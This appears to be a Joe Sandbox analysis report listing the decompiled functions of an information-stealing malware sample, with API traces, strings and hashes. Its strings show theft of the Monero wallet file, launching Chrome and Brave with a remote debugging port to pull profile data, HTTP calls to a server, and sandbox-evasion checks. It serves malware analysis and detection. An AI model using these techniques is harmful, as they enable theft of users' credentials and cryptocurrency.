                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00696D88
                                    • CloseHandle.KERNEL32(00000000), ref: 00696D99
                                    • Sleep.KERNEL32(00001770), ref: 00696DA4
                                    • CloseHandle.KERNEL32(?,00000000,?,014290C8,?,006A10F4,?,00000000,?,006A10F8,?,00000000,006A0AF3), ref: 00696DBA
                                    • ExitProcess.KERNEL32 ref: 00696DC2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                    • String ID:
                                    • API String ID: 941982115-0
                                    • Opcode ID: 65e042ce1d3d63dd3d09ee8a2b8d23369e404f34bf1f1954bfe83230d6a44aea
                                    • Instruction ID: ea1c990df206069ebd595f30fe04e031bfdf137cd6de333073666136786f60e8
                                    • Opcode Fuzzy Hash: 65e042ce1d3d63dd3d09ee8a2b8d23369e404f34bf1f1954bfe83230d6a44aea
                                    • Instruction Fuzzy Hash: 69F0543064C305ABEF40ABE0EC06BBDB37DAF04712F100519B52295994CBB05609D7A5
                                    Function 00684800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684889
                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00684899
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1274457161-4251816714
                                    • Opcode ID: a87e78f1f54226d7edccf5f7810e71a4e9ed6546575c4c39ca4dbf6afcc6f2a6
                                    • Instruction ID: 70d83df2e5b2f3517267f732087af52696c7cb11486c8c6e0600a7641df6a4f0
                                    • Opcode Fuzzy Hash: a87e78f1f54226d7edccf5f7810e71a4e9ed6546575c4c39ca4dbf6afcc6f2a6
                                    • Instruction Fuzzy Hash: A2213EB1D00209ABDF14DFA5EC45ADEBB79FF45320F108629F915A7291EB706A09CB81
                                    Function 00695440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                      • Part of subcall function 006862D0: InternetOpenA.WININET(006A0DFF,00000001,00000000,00000000,00000000), ref: 00686331
                                      • Part of subcall function 006862D0: StrCmpCA.SHLWAPI(?,0142E2C0), ref: 00686353
                                      • Part of subcall function 006862D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00686385
                                      • Part of subcall function 006862D0: HttpOpenRequestA.WININET(00000000,GET,?,0142D6B0,00000000,00000000,00400100,00000000), ref: 006863D5
                                      • Part of subcall function 006862D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0068640F
                                      • Part of subcall function 006862D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00686421
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00695478
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                    • String ID: ERROR$ERROR
                                    • API String ID: 3287882509-2579291623
                                    • Opcode ID: 129d5819ef7d32e2a1f25cbd46767e3b5fcba249f05f29682651a7863159fb85
                                    • Instruction ID: 0ad99e0f74b603936d718ef83c23803cbf9764c10ebc1440f18e621b156eb435
                                    • Opcode Fuzzy Hash: 129d5819ef7d32e2a1f25cbd46767e3b5fcba249f05f29682651a7863159fb85
                                    • Instruction Fuzzy Hash: 8B111F309001089BCF54FFA4D952AED736E9F10340F40465CF91A5A892EF30AB09CBD9
                                    Function 00697A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697AA0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00697AA7
                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 00697ABF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateComputerNameProcess
                                    • String ID:
                                    • API String ID: 1664310425-0
                                    • Opcode ID: a97b29684fc1ec46d454ea12b22d6a024f3818ded766383dcd98a934a0ef298f
                                    • Instruction ID: a3befb32eea591aaaccb6211b1e78bebf7770c2129bf1db1c7ec22c554671bcc
                                    • Opcode Fuzzy Hash: a97b29684fc1ec46d454ea12b22d6a024f3818ded766383dcd98a934a0ef298f
                                    • Instruction Fuzzy Hash: 1B0186B1A18349ABCB00DF99DD45BAEFBBCF704711F10011AF515E2680D7745A009BA1
                                    Function 00681110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0068112B
                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00681132
                                    • ExitProcess.KERNEL32 ref: 00681143
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$AllocCurrentExitNumaVirtual
                                    • String ID:
                                    • API String ID: 1103761159-0
                                    • Opcode ID: d761a54e44f564db10fc5fd87f67f3115a737384af3980b77ecd367ba06de8f1
                                    • Instruction ID: e46c2dfeff21c701599765260bdb165f33b8b37d84712069e6d9feaddad16358
                                    • Opcode Fuzzy Hash: d761a54e44f564db10fc5fd87f67f3115a737384af3980b77ecd367ba06de8f1
                                    • Instruction Fuzzy Hash: 6EE0867095D308FBE7106BD1AC0EB4CB66C9B04B06F100144F7087A1D0CAB426409758
                                    Function 006810A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006810B3
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 006810F7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: a3769ad367ae672d2ab75541846b7383bda9458069db54186381d65cd12ad4d0
                                    • Instruction ID: 943d05fda76e73e54a9184115b1f9d2122b2e4bde68744f404d736d417d048f1
                                    • Opcode Fuzzy Hash: a3769ad367ae672d2ab75541846b7383bda9458069db54186381d65cd12ad4d0
                                    • Instruction Fuzzy Hash: 29F0E2B1645308BBEB14AAB4AC59FAEB79CE706B05F300548F500E7280D9719F009BA4
                                    Function 00681190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00697A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697AA0
                                      • Part of subcall function 00697A70: RtlAllocateHeap.NTDLL(00000000), ref: 00697AA7
                                      • Part of subcall function 00697A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00697ABF
                                      • Part of subcall function 006979E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006811B7), ref: 00697A10
                                      • Part of subcall function 006979E0: RtlAllocateHeap.NTDLL(00000000), ref: 00697A17
                                      • Part of subcall function 006979E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00697A2F
                                    • ExitProcess.KERNEL32 ref: 006811C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                                    • String ID:
                                    • API String ID: 3550813701-0
                                    • Opcode ID: 26f0f2a927c5ea9fe30eb46b2b00b6eca6f14d611732ce13c48efc69237840b9
                                    • Instruction ID: 6a015e443864c016659272b208f35cae0f01017529b5f0456daecf5ee8722bd8
                                    • Opcode Fuzzy Hash: 26f0f2a927c5ea9fe30eb46b2b00b6eca6f14d611732ce13c48efc69237840b9
                                    • Instruction Fuzzy Hash: 76E0ECA592830556CE5073B67C0AB6A328E5B1620BF040828F904C7646ED25E9015369

                                    Non-executed Functions

                                    Function 0068BE40 Relevance: 58.5, APIs: 26, Strings: 7, Instructions: 730fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,006A0B32,006A0B2F,00000000,?,?,?,006A1450,006A0B2E), ref: 0068BEC5
                                    • StrCmpCA.SHLWAPI(?,006A1454), ref: 0068BF33
                                    • StrCmpCA.SHLWAPI(?,006A1458), ref: 0068BF49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0068C8A9
                                    • FindClose.KERNEL32(000000FF), ref: 0068C8BB
                                    Strings
                                    • Google Chrome, xrefs: 0068C6F8
                                    • Preferences, xrefs: 0068C104
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 0068C3B2
                                    • \Brave\Preferences, xrefs: 0068C1C1
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 0068C534
                                    • Brave, xrefs: 0068C0E8
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 0068C495
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 3334442632-1869280968
                                    • Opcode ID: 92115a833a96a2558fcbfb734f120e0baff7bf83c6e3771a6a7233c2bf3cd96f
                                    • Instruction ID: 32a2fb23922bbd81f412af7cf3c48c153bce8749098574a7542329b36dc04829
                                    • Opcode Fuzzy Hash: 92115a833a96a2558fcbfb734f120e0baff7bf83c6e3771a6a7233c2bf3cd96f
                                    • Instruction Fuzzy Hash: 375233725141089BCF54FBA0DD96EFE737EAF54301F40469CB50AA6491EE306B48CFAA
                                    Function 00693B00 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00693B1C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00693B33
                                    • lstrcat.KERNEL32(?,?), ref: 00693B85
                                    • StrCmpCA.SHLWAPI(?,006A0F58), ref: 00693B97
                                    • StrCmpCA.SHLWAPI(?,006A0F5C), ref: 00693BAD
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00693EB7
                                    • FindClose.KERNEL32(000000FF), ref: 00693ECC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 1125553467-2524465048
                                    • Opcode ID: f42edc3afa26fbb105006d1e5297e49049c38b8c403e4747a9cfe9048028463f
                                    • Instruction ID: a5c0931da7ed5f9bf7c3a0a6f2d742542be74b7af213c0222920ad19a07d53c2
                                    • Opcode Fuzzy Hash: f42edc3afa26fbb105006d1e5297e49049c38b8c403e4747a9cfe9048028463f
                                    • Instruction Fuzzy Hash: 17A161B1A142189FDF64EFA4DC85FEA737DAB45301F044588B60D96681EB709B84CF61
                                    Function 00694B60 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00694B7C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00694B93
                                    • StrCmpCA.SHLWAPI(?,006A0FC4), ref: 00694BC1
                                    • StrCmpCA.SHLWAPI(?,006A0FC8), ref: 00694BD7
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00694DCD
                                    • FindClose.KERNEL32(000000FF), ref: 00694DE2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
